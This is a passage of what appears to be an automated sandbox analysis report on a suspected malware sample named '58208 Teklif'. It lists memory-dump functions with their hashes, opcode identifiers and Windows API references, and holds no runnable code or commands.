                                                      • Instruction Fuzzy Hash: 4012AE30A01255DFCB15CFA8C694AAEBBF2BF89304F258956E405DB3A9C731EC81CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BFF6F3 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BFF862
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 3b39a397b9ca744cdef3182195bad4b3b1965380452802c031bd92133791f9c9
                                                      • Instruction ID: 8725788e7d2f2b8e57b448044ca1bdbb36110467a3a563907e8f867556f4ed5c
                                                      • Opcode Fuzzy Hash: 3b39a397b9ca744cdef3182195bad4b3b1965380452802c031bd92133791f9c9
                                                      • Instruction Fuzzy Hash: DD6101B1C10249AFCF11CFA9C980ADEBFB6FF49300F14819AE918AB261D7719955CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01410C8F Relevance: 1.7, Strings: 1, Instructions: 417COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR_q
                                                      • API String ID: 0-2241839734
                                                      • Opcode ID: f369904e6c874ea3615eeb5d4e845ed6580f09a76979d3723e38a205e0edb569
                                                      • Instruction ID: 4b6cfef0a3d8c1f1bd713c56ad5518b9a823125794c72b8b21db00b010c54361
                                                      • Opcode Fuzzy Hash: f369904e6c874ea3615eeb5d4e845ed6580f09a76979d3723e38a205e0edb569
                                                      • Instruction Fuzzy Hash: 4922ED74A4022ACFCB54EF75E995A9DBBB1FF48300F1086A9E509AB358DB306D85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01410C9C Relevance: 1.7, Strings: 1, Instructions: 411COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR_q
                                                      • API String ID: 0-2241839734
                                                      • Opcode ID: 4e31f5ae7aecf2be712dc26959ea966d4acde9449b6a06103f10ebfb1bc32f26
                                                      • Instruction ID: 8b73f97c58de3cce5bb24291cf6fe5bdf8e401839d486788123447fd18795977
                                                      • Opcode Fuzzy Hash: 4e31f5ae7aecf2be712dc26959ea966d4acde9449b6a06103f10ebfb1bc32f26
                                                      • Instruction Fuzzy Hash: 2D22ED74A4022ACFCB54EF75E995A9DBBB1FF48300F1086A9E509AB358DB306D85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01410CA0 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR_q
                                                      • API String ID: 0-2241839734
                                                      • Opcode ID: 14cb3156a0cfb85461c18d6bee4dd5c676f1447f234700e7f7f6929c1230ae95
                                                      • Instruction ID: b4b6f08c3050c119025e4aea4af7327a84d705ce770a25a08ebb814f02f9c6c5
                                                      • Opcode Fuzzy Hash: 14cb3156a0cfb85461c18d6bee4dd5c676f1447f234700e7f7f6929c1230ae95
                                                      • Instruction Fuzzy Hash: AE22ED74A4022ACFCB54EF75E995A9DBBB5FF48300F1086A9E509AB358DB306D85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BFF6BB Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BFF862
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: c2b831f1be3608f8122ff607c746447bff6ac82fb18fb1c1f4fb14f61b24bd5c
                                                      • Instruction ID: a18d4299a2b02b727e17f56b74012de79eed16403d0c72fe9398baef82846460
                                                      • Opcode Fuzzy Hash: c2b831f1be3608f8122ff607c746447bff6ac82fb18fb1c1f4fb14f61b24bd5c
                                                      • Instruction Fuzzy Hash: 425145B1C153489FDB15CFA9C850AEDBFB5FF49300F24819AE818AB261C7749849CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BFD84C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BFF862
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: b26a8cdb7fef12191dc3791af91e4d72525b1b064738fba129fda3476245b764
                                                      • Instruction ID: 28e4f847453aee6ccdfa147a8cc0e6aa37f209ced5424119bfda16d32c378ee9
                                                      • Opcode Fuzzy Hash: b26a8cdb7fef12191dc3791af91e4d72525b1b064738fba129fda3476245b764
                                                      • Instruction Fuzzy Hash: 6851BFB1D10309DFDB54CFAAC884ADEBBB5FF48310F64816AE919AB220D7749845CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9BFC4 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 044c59debe28adc61cd6182dfce9ec5abd14f42f621bde9e835de21e69c38d0e
                                                      • Instruction ID: 9e6460bde93210fff7ae41b6e1f2f4b633cb1de2070badcaf1e9f1f830342a35
                                                      • Opcode Fuzzy Hash: 044c59debe28adc61cd6182dfce9ec5abd14f42f621bde9e835de21e69c38d0e
                                                      • Instruction Fuzzy Hash: 86414974908128DBCF08CF99D4D4AEDBBF2BF58314F608159E419AB295CB35A986CF60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9BF64 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ab34d161f5c310ef552ce5612eb430fa9138c4c2dcdab6f9e9df8093722e749
                                                      • Instruction ID: eff2889bf08866b0af7f52ff96fa19ba8c6292cc4ad14652454d9b070419b551
                                                      • Opcode Fuzzy Hash: 3ab34d161f5c310ef552ce5612eb430fa9138c4c2dcdab6f9e9df8093722e749
                                                      • Instruction Fuzzy Hash: 7C411474908129DFCB08CF99E0C4AEDBBF2BF48314F248159E415AB291CB35A986CF60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A9BE28 Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f2cd866680f8a427e680ec6ad5538ebafe200dbc064c0c3be61bebdb066a7d65
                                                      • Instruction ID: 326d1765e7b2830a26bd992282e92129c64ff211616c232b78d4dbb3d154cb31
                                                      • Opcode Fuzzy Hash: f2cd866680f8a427e680ec6ad5538ebafe200dbc064c0c3be61bebdb066a7d65
                                                      • Instruction Fuzzy Hash: 3B4159B4D042189BDF08CF9AD4C4ADDFBF6BF88314F248159E4046B295C735A986CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BF4834 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06BF4D76,?,?,?,?,?), ref: 06BF4E37
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 1d8b36e2e84558fd912e5014652c62b5b26ce0ee5410767e8fb71ee85db65ded
                                                      • Instruction ID: 36189a0bbf3a7e8b9d5901d74b2de3cc4bea6a39af4cd9e64c834488e77dc207
                                                      • Opcode Fuzzy Hash: 1d8b36e2e84558fd912e5014652c62b5b26ce0ee5410767e8fb71ee85db65ded
                                                      • Instruction Fuzzy Hash: D721E5B5D102489FDB50CFAAD984ADEBBF4EB48310F14845AE914B3311D374A954CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BF4DA9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06BF4D76,?,?,?,?,?), ref: 06BF4E37
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: d2bcc4d96d64c87cc34040ac7f2e6b5e16f3c42a8e4ba1a6b4f1e969eff68f22
                                                      • Instruction ID: 817b4249122ea820a413ca46d0846cbc397fd65fd7b5683c9a7a2cb092738775
                                                      • Opcode Fuzzy Hash: d2bcc4d96d64c87cc34040ac7f2e6b5e16f3c42a8e4ba1a6b4f1e969eff68f22
                                                      • Instruction Fuzzy Hash: 6821E4B5D00248AFDB10CFAAD984AEEBFF5FB48310F14845AE918A7310D374A954CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A98D94 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 05A98ED6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: fa0c1dce200efd3c747a567b79ade55f1fb7c72ae14407024c507454f215ab3a
                                                      • Instruction ID: e60c645f410c82b28ac7a986451de42ec0be084cfa7e0be022e45bf644a3357e
                                                      • Opcode Fuzzy Hash: fa0c1dce200efd3c747a567b79ade55f1fb7c72ae14407024c507454f215ab3a
                                                      • Instruction Fuzzy Hash: 02114274E0112A9FDF08DBA9D894EADBBF5FF89304F14C159E814A7246D738E845CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BFC148 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06BFD439,00000800,00000000,00000000), ref: 06BFD62A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: e7dc2e98f26bbaa46938303807f614654d5e4e08704fa1f1075be21962ecd110
                                                      • Instruction ID: b0ba83bce31fe94997b22ea32941356ed19cf56dd74da73ecbe29cdf07a66c18
                                                      • Opcode Fuzzy Hash: e7dc2e98f26bbaa46938303807f614654d5e4e08704fa1f1075be21962ecd110
                                                      • Instruction Fuzzy Hash: 3E1103B6C002099FDB10DFAAD844A9EFBF4EB48310F10846AE519B7210C375A549CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BFD5BB Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06BFD439,00000800,00000000,00000000), ref: 06BFD62A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: ae4835f4432bac1ee06820ab4ce9c28d83ed35cbf87ac992bbbbe65c09bebf29
                                                      • Instruction ID: a88771590456f10767c6f135a850f8eb2a27288dce5d3d7f69b510e9498110c0
                                                      • Opcode Fuzzy Hash: ae4835f4432bac1ee06820ab4ce9c28d83ed35cbf87ac992bbbbe65c09bebf29
                                                      • Instruction Fuzzy Hash: 851114B6C002089FCB10DFAAD444ADEFBF4EF48310F14845EE519A7210C375A549CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BFC100 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06BFD184), ref: 06BFD3BE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: d0c89af7e5800a0fef55fb99c1205eb34dd8021f5087f31533a65a572207b708
                                                      • Instruction ID: 706f83d36aa2af6349f36168aa0a02d7116a52fe7d064ea4a8a0f573cbf7d53e
                                                      • Opcode Fuzzy Hash: d0c89af7e5800a0fef55fb99c1205eb34dd8021f5087f31533a65a572207b708
                                                      • Instruction Fuzzy Hash: 601102B6C003498FCB60DF9AD444B9EFBF4EF88210F15845AD619B7210D379A549CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BFD353 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06BFD184), ref: 06BFD3BE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790247236.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bf0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 2112aa66d76f7787fd929490b7193f7161b3eb23e3ade27cddaad05f01b1cb05
                                                      • Instruction ID: 0f8c4ca94c7b20b89e7516321aed0dcef1c6895f46027eee3ded5cabd7a1ac0e
                                                      • Opcode Fuzzy Hash: 2112aa66d76f7787fd929490b7193f7161b3eb23e3ade27cddaad05f01b1cb05
                                                      • Instruction Fuzzy Hash: 6D1113B6D002498FCB20DF9AD444ADEFBF4EF88310F15845AD919B7210C375A545CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141A258 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'_q
                                                      • API String ID: 0-2033115326
                                                      • Opcode ID: 11da3395d2cd7e0866b7ba88c81b07b2f65090758b3253500193096b2ec44637
                                                      • Instruction ID: 321a0c4b16dfc81bae16eabbb534730872d15e833bb28869f8a46034b2b35417
                                                      • Opcode Fuzzy Hash: 11da3395d2cd7e0866b7ba88c81b07b2f65090758b3253500193096b2ec44637
                                                      • Instruction Fuzzy Hash: 55417875A402598FCB15DF69C848BAE7BB5BB88310F20006AF906CB3B5CB71DD81CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141FDA8 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -)1#
                                                      • API String ID: 0-1789991113
                                                      • Opcode ID: 8551da919e7261af1e7eeeb5dcf664e46ee7e558a6f0854861b734c9386b4957
                                                      • Instruction ID: 975146f284585fd2875500bbe35ce2a360c77b920f46a79bfa746f46cdd1f2dc
                                                      • Opcode Fuzzy Hash: 8551da919e7261af1e7eeeb5dcf664e46ee7e558a6f0854861b734c9386b4957
                                                      • Instruction Fuzzy Hash: B2217331E0030A8BDB14EBA9C1556AEBBB1AB49B14F20441EC511BB369CB719D4ECBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141A878 Relevance: .4, Instructions: 405COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd33d7812cf20ee579cb90a265cb782a9d0cfc416f5e3b3a61f42fae07f3269a
                                                      • Instruction ID: d88dda3c593467d68479ffefbd69b20e564e004e958b2541d5c3f89777ce2a4e
                                                      • Opcode Fuzzy Hash: fd33d7812cf20ee579cb90a265cb782a9d0cfc416f5e3b3a61f42fae07f3269a
                                                      • Instruction Fuzzy Hash: 81F14D75B012548FCB04CF6DC584AAEBBF6BF88310B2A845AE519AB375D731EC81CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 014198B8 Relevance: .3, Instructions: 304COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67e2ec205a1b55a68436e5e994e8de5ed753209acabceb0f62e4ec5003e66bcb
                                                      • Instruction ID: 8df12561ef40eb969c7fe8b4721535a256b5dc440de78d8297a0cc2063e84145
                                                      • Opcode Fuzzy Hash: 67e2ec205a1b55a68436e5e994e8de5ed753209acabceb0f62e4ec5003e66bcb
                                                      • Instruction Fuzzy Hash: 56D1BB75A00249CFCB15CFA9C894A9EBFF2FF88304F04856AE945AB365D330E955CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01417498 Relevance: .2, Instructions: 201COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cf75f2f1b05f0c5962e5c56a33dc39caa5145c3a9602013046dbf708c01cec73
                                                      • Instruction ID: ef23b780331e1d57cc84b92124d63ef02feedb34d34df9482315dd17ed5ca5ef
                                                      • Opcode Fuzzy Hash: cf75f2f1b05f0c5962e5c56a33dc39caa5145c3a9602013046dbf708c01cec73
                                                      • Instruction Fuzzy Hash: 0D716C307402418FDB15DF2DC888A6E7BE5AF49352F1948AAE505CB3B6DB70DC41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141D3C2 Relevance: .2, Instructions: 172COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a295c6d3613f470cd13a8f49acfe3cf97339a6005998bd4c07c20dc3aa4a1118
                                                      • Instruction ID: c6075b3d0d47fad78f82b5a80aa735f7bcbeadebbf7ab8bf393092decd0aa178
                                                      • Opcode Fuzzy Hash: a295c6d3613f470cd13a8f49acfe3cf97339a6005998bd4c07c20dc3aa4a1118
                                                      • Instruction Fuzzy Hash: 3C51BF708E57469FD7182F26A9AD17E7BB0FB4F723B856D04F08E918188B7560A5CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD15F3 Relevance: .2, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 187501609e8ab4b5141aac8364d84e1159bb6791e85f65f46ee8683afee9499e
                                                      • Instruction ID: 0657cbe0541ff652288b3b4e8c4d4d73647bd8299af3b3156b43c3531ac24c35
                                                      • Opcode Fuzzy Hash: 187501609e8ab4b5141aac8364d84e1159bb6791e85f65f46ee8683afee9499e
                                                      • Instruction Fuzzy Hash: 5E81B374E412299FDB65DF29D954BEDBBB2BF89300F1081EAE809A7254DB305E85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141D3D0 Relevance: .2, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 104325b1d1ac1b9cdd1a7375406146c0390295585ebc34db41fcaf6b825c7e6d
                                                      • Instruction ID: aec6d84d036c55a6e435ed7f15c88c4c1291fff5cac4656dafdea53be96b0fa2
                                                      • Opcode Fuzzy Hash: 104325b1d1ac1b9cdd1a7375406146c0390295585ebc34db41fcaf6b825c7e6d
                                                      • Instruction Fuzzy Hash: 7551AD708E57468FD3183F26A9AE17E7BB4FB4F723B856C04F09E918189B7560A5CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141D719 Relevance: .2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f664b50b443a39308b3e979a83d24fe151abff1f865cdc8a2b4f4ad641a67e7c
                                                      • Instruction ID: d265b2f476b5ed7083d11ce4df1fda38e85f16cbf17c1a06eb1bc8ee5efe4f37
                                                      • Opcode Fuzzy Hash: f664b50b443a39308b3e979a83d24fe151abff1f865cdc8a2b4f4ad641a67e7c
                                                      • Instruction Fuzzy Hash: E65107B4E112188FCB04DFAAD594AEDBBF2BF89300F14952AE415BB368DB349845CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141E7CD Relevance: .1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19ba689f71bfcbc76da0df6dd20c5f43bfefe80d723f894478677d22b82455e6
                                                      • Instruction ID: 320071b17b27b08e28c882ae91314764708838f3867fb2c74bb4914b652ac7cc
                                                      • Opcode Fuzzy Hash: 19ba689f71bfcbc76da0df6dd20c5f43bfefe80d723f894478677d22b82455e6
                                                      • Instruction Fuzzy Hash: B1510278E01319DFDB15DFA5D9546AEBBB2FF88300F208529E805AB368DB356949CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141CD70 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b8c60fc30f43f37b0c7d7bfeadb13e62b5784c6b416ab42178b956bb15d15cb6
                                                      • Instruction ID: 17a10350040ad5bba46e76842d2d9620877fb1dbb2f02ed98552f4c73a033ee6
                                                      • Opcode Fuzzy Hash: b8c60fc30f43f37b0c7d7bfeadb13e62b5784c6b416ab42178b956bb15d15cb6
                                                      • Instruction Fuzzy Hash: CF519374E012189FDB58DFAAD9949DDBBF2FF89300F209169E819AB364DB309901CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDE110 Relevance: .1, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0cb6659c6c4217f931a5c36bd00f1b902b7cdf51ffa53eddfeb795657664001f
